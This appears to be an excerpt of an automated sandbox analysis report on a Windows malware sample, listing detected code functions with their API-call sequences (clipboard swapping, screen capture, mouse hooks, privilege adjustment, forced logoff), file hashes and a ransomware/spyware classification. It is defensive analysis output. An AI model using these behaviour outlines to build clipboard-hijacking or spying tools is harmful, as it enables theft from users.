                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03D86770 CreateMutexW,CreateMutexW,GetLastError,GetLastError,Sleep,Sleep,CreateMutexW,GetLastError,lstrlenW,lstrcmpW,_memset,lstrlenW,lstrcmpW,Sleep,GetModuleHandleW,GetConsoleWindow,Sleep,CreateMutexW,GetLastError,_memset,lstrlenW,lstrcmpW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,_memset,RegQueryValueExW,std::locale::_Init,std::_Lockit::_Lockit,_memmove,_memmove,_memmove,_memmove,GetDesktopWindow,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,GlobalUnlock,CloseClipboard,std::locale::_Init,std::_Lockit::_Lockit,_memmove,GetDesktopWindow,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,6_2_03D86770
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03D96940 GetDesktopWindow,GetDC,GetDC,CreateCompatibleDC,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,GetSystemMetrics,GetSystemMetrics,StretchBlt,_memset,GetDIBits,_memset,_memmove,DeleteObject,DeleteObject,ReleaseDC,_memmove,DeleteObject,DeleteObject,ReleaseDC,6_2_03D96940
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03D99090 Sleep,CreateMutexW,GetLastError,SHGetFolderPathW,lstrcatW,CreateMutexW,WaitForSingleObject,CreateFileW,GetFileSize,CloseHandle,DeleteFileW,ReleaseMutex,DirectInput8Create,GetTickCount,GetKeyState,6_2_03D99090
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeWindows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dllJump to behavior

                      Spam, unwanted Advertisements and Ransom Demands

                      barindex
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3C8C7D ReleaseMutex,WriteProfileStringA,WriteProfileStringA,WriteProfileStringA,SystemParametersInfoA,6_2_6C3C8C7D
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3C8C7D ReleaseMutex,WriteProfileStringA,WriteProfileStringA,WriteProfileStringA,SystemParametersInfoA,7_2_6C3C8C7D

                      System Summary

                      barindex
                      Source: t3d.tmp.0.drZip Entry: encrypted
                      Source: t3d.tmp.0.drZip Entry: encrypted
                      Source: t3d.tmp.0.drZip Entry: encrypted
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03D96143 ExitWindowsEx,6_2_03D96143
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03D9611F ExitWindowsEx,6_2_03D9611F
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03D960FB ExitWindowsEx,6_2_03D960FB
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeCode function: 0_2_042900310_2_04290031
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeCode function: 0_2_042964A60_2_042964A6
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeCode function: 0_2_042A44D30_2_042A44D3
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeCode function: 0_2_042A65B60_2_042A65B6
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeCode function: 0_2_04296E410_2_04296E41
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeCode function: 0_2_042A4F780_2_042A4F78
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeCode function: 0_2_0429B9040_2_0429B904
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeCode function: 0_2_042A4A240_2_042A4A24
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeCode function: 0_2_10005CA20_2_10005CA2
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeCode function: 0_2_1000839B0_2_1000839B
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeCode function: 0_2_100064A20_2_100064A2
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeCode function: 0_2_100144CF0_2_100144CF
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeCode function: 0_2_1000B9000_2_1000B900
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeCode function: 0_2_100165B20_2_100165B2
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeCode function: 0_2_10014A200_2_10014A20
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeCode function: 0_2_10006E3D0_2_10006E3D
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeCode function: 0_2_10014F740_2_10014F74
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_02F12EA16_2_02F12EA1
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_02F0B77B6_2_02F0B77B
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_02F11F6C6_2_02F11F6C
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_02F1133F6_2_02F1133F
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_02F024B06_2_02F024B0
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_02F118906_2_02F11890
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_02F10DEE6_2_02F10DEE
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03D883E06_2_03D883E0
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03D881506_2_03D88150
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03D9EB966_2_03D9EB96
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03DA9AD56_2_03DA9AD5
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03DAE2AC6_2_03DAE2AC
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03D939A06_2_03D939A0
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03D9E7C46_2_03D9E7C4
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03DAE7FD6_2_03DAE7FD
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03D9DF916_2_03D9DF91
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03D9EF7E6_2_03D9EF7E
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03DAED4E6_2_03DAED4E
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03D825006_2_03D82500
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03D9B4906_2_03D9B490
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03DB040C6_2_03DB040C
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03DAF42A6_2_03DAF42A
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03D9E4266_2_03D9E426
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3958356_2_6C395835
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3511126_2_6C351112
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3F1CD16_2_6C3F1CD1
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3D9CC56_2_6C3D9CC5
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C359CCA6_2_6C359CCA
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C36CD326_2_6C36CD32
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3B9D7B6_2_6C3B9D7B
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3CBD486_2_6C3CBD48
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3E6D466_2_6C3E6D46
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3ADD8F6_2_6C3ADD8F
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3AEDF56_2_6C3AEDF5
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C39BDD06_2_6C39BDD0
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3C9E126_2_6C3C9E12
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3F8E6E6_2_6C3F8E6E
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C358E606_2_6C358E60
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3C3E4C6_2_6C3C3E4C
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C36AED76_2_6C36AED7
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C36DF3F6_2_6C36DF3F
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3E7F376_2_6C3E7F37
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C36BFD76_2_6C36BFD7
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C36387C6_2_6C36387C
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3F19336_2_6C3F1933
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3769736_2_6C376973
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3D59906_2_6C3D5990
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3909DA6_2_6C3909DA
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3DB9D76_2_6C3DB9D7
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3D99C66_2_6C3D99C6
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3DCAA56_2_6C3DCAA5
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C365BBD6_2_6C365BBD
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C367BAA6_2_6C367BAA
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C35EBF46_2_6C35EBF4
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3C0BCC6_2_6C3C0BCC
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C35B41A6_2_6C35B41A
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3F149E6_2_6C3F149E
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3F248B6_2_6C3F248B
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3EB5036_2_6C3EB503
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3645446_2_6C364544
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3805B36_2_6C3805B3
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3C86B76_2_6C3C86B7
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3C46986_2_6C3C4698
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3656986_2_6C365698
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3986896_2_6C398689
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3CF6C96_2_6C3CF6C9
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C39D7686_2_6C39D768
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3D974B6_2_6C3D974B
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3E67F56_2_6C3E67F5
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3C20256_2_6C3C2025
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3C70036_2_6C3C7003
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3BB07C6_2_6C3BB07C
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3F20A36_2_6C3F20A3
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C37E0D86_2_6C37E0D8
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3AA1926_2_6C3AA192
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C35E1C86_2_6C35E1C8
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3582796_2_6C358279
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3D026A6_2_6C3D026A
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3B32666_2_6C3B3266
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3682B26_2_6C3682B2
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3E62A66_2_6C3E62A6
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3B62E86_2_6C3B62E8
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3F42E16_2_6C3F42E1
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3BF32A6_2_6C3BF32A
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3563746_2_6C356374
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3C83686_2_6C3C8368
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3BE35C6_2_6C3BE35C
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3BC38C6_2_6C3BC38C
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C38A3866_2_6C38A386
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3F93C96_2_6C3F93C9
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_032C125D6_2_032C125D
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_032BB1486_2_032BB148
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_032C286E6_2_032C286E
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_032C07BB6_2_032C07BB
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_032B1E7D6_2_032B1E7D
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_032C0D0C6_2_032C0D0C
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03C0335F6_2_03C0335F
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03BF7B0F6_2_03BF7B0F
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3958357_2_6C395835
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3511127_2_6C351112
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3F1CD17_2_6C3F1CD1
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3D9CC57_2_6C3D9CC5
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C359CCA7_2_6C359CCA
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C36CD327_2_6C36CD32
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3B9D7B7_2_6C3B9D7B
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3CBD487_2_6C3CBD48
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3E6D467_2_6C3E6D46
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3ADD8F7_2_6C3ADD8F
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3AEDF57_2_6C3AEDF5
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C39BDD07_2_6C39BDD0
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3C9E127_2_6C3C9E12
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3F8E6E7_2_6C3F8E6E
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C358E607_2_6C358E60
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3C3E4C7_2_6C3C3E4C
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C36AED77_2_6C36AED7
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C36DF3F7_2_6C36DF3F
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3E7F377_2_6C3E7F37
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C36BFD77_2_6C36BFD7
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C36387C7_2_6C36387C
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3F19337_2_6C3F1933
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3769737_2_6C376973
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3D59907_2_6C3D5990
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3909DA7_2_6C3909DA
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3DB9D77_2_6C3DB9D7
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3D99C67_2_6C3D99C6
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3DCAA57_2_6C3DCAA5
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C365BBD7_2_6C365BBD
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C367BAA7_2_6C367BAA
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C35EBF47_2_6C35EBF4
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3C0BCC7_2_6C3C0BCC
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C35B41A7_2_6C35B41A
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3F149E7_2_6C3F149E
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3F248B7_2_6C3F248B
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3EB5037_2_6C3EB503
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3645447_2_6C364544
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3805B37_2_6C3805B3
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3C86B77_2_6C3C86B7
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3C46987_2_6C3C4698
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3656987_2_6C365698
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3986897_2_6C398689
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3CF6C97_2_6C3CF6C9
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C39D7687_2_6C39D768
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3D974B7_2_6C3D974B
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3E67F57_2_6C3E67F5
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3C20257_2_6C3C2025
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3C70037_2_6C3C7003
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3BB07C7_2_6C3BB07C
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3F20A37_2_6C3F20A3
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C37E0D87_2_6C37E0D8
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3AA1927_2_6C3AA192
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C35E1C87_2_6C35E1C8
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3582797_2_6C358279
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3D026A7_2_6C3D026A
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3B32667_2_6C3B3266
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3682B27_2_6C3682B2
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3E62A67_2_6C3E62A6
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3B62E87_2_6C3B62E8
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3F42E17_2_6C3F42E1
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3BF32A7_2_6C3BF32A
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3563747_2_6C356374
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3C83687_2_6C3C8368
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3BE35C7_2_6C3BE35C
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3BC38C7_2_6C3BC38C
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C38A3867_2_6C38A386
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3F93C97_2_6C3F93C9
                      Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe E528455778D952ACFC5B330B378F2C53CC92E55CFEAB1C1E1DBB52E01D626BB4
                      Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\IemFNe\MSVCP140.dll 885A0A146A83B0D5A19B88C4EB6372B648CFAED817BD31D8CD3FB91313DEA13D
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: String function: 6C35C822 appears 40 times
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: String function: 03DA2EF0 appears 33 times
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: String function: 6C35CB4D appears 878 times
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: String function: 6C3D7ECE appears 72 times
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: String function: 6C3D1F84 appears 938 times
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: String function: 6C3D9165 appears 42 times
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: String function: 6C3714FC appears 136 times
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: String function: 6C3D3864 appears 346 times
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: String function: 6C3E9148 appears 46 times
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: String function: 6C372962 appears 66 times
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: String function: 6C3D7820 appears 146 times
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: String function: 6C3D23D3 appears 38 times
                      Source: N6xnw0iEGs.exeStatic PE information: Resource name: BIN type: PE32 executable (console) Intel 80386, for MS Windows
                      Source: N6xnw0iEGs.exe, 00000000.00000000.1747294467.000000000217E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNetDiagnotor.exe4 vs N6xnw0iEGs.exe
                      Source: N6xnw0iEGs.exe, 00000000.00000001.1750015972.00000000005B7000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename7z.sfx.exe, vs N6xnw0iEGs.exe
                      Source: N6xnw0iEGs.exe, 00000000.00000002.2992419082.0000000005410000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs N6xnw0iEGs.exe
                      Source: N6xnw0iEGs.exeBinary or memory string: OriginalFilename7z.sfx.exe, vs N6xnw0iEGs.exe
                      Source: N6xnw0iEGs.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@5/8@1/2
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeCode function: 0_2_042918A4 AdjustTokenPrivileges,0_2_042918A4
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeCode function: 0_2_100018A0 AdjustTokenPrivileges,0_2_100018A0
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeCode function: 0_2_100018EA OpenProcess,OpenProcessToken,CloseHandle,AdjustTokenPrivileges,GetLengthSid,SetTokenInformation,OpenProcess,OpenProcessToken,CloseHandle,AdjustTokenPrivileges,GetLengthSid,SetTokenInformation,OpenProcess,OpenProcessToken,CloseHandle,AdjustTokenPrivileges,GetLengthSid,SetTokenInformation,OpenProcess,OpenProcessToken,CloseHandle,AdjustTokenPrivileges,GetLengthSid,SetTokenInformation,0_2_100018EA
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeCode function: 0_2_10001772 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,CloseHandle,AdjustTokenPrivileges,0_2_10001772
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03D88B20 CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,OpenProcess,6_2_03D88B20
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03D89070 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,6_2_03D89070
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03D88C40 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,6_2_03D88C40
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03D88150 wsprintfW,MultiByteToWideChar,GetDriveTypeW,GetDiskFreeSpaceExW,_memset,GlobalMemoryStatusEx,swprintf,swprintf,6_2_03D88150
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeCode function: 0_2_100017FE CreateToolhelp32Snapshot,_memset,Process32FirstW,lstrcmpiW,Process32NextW,CloseHandle,0_2_100017FE
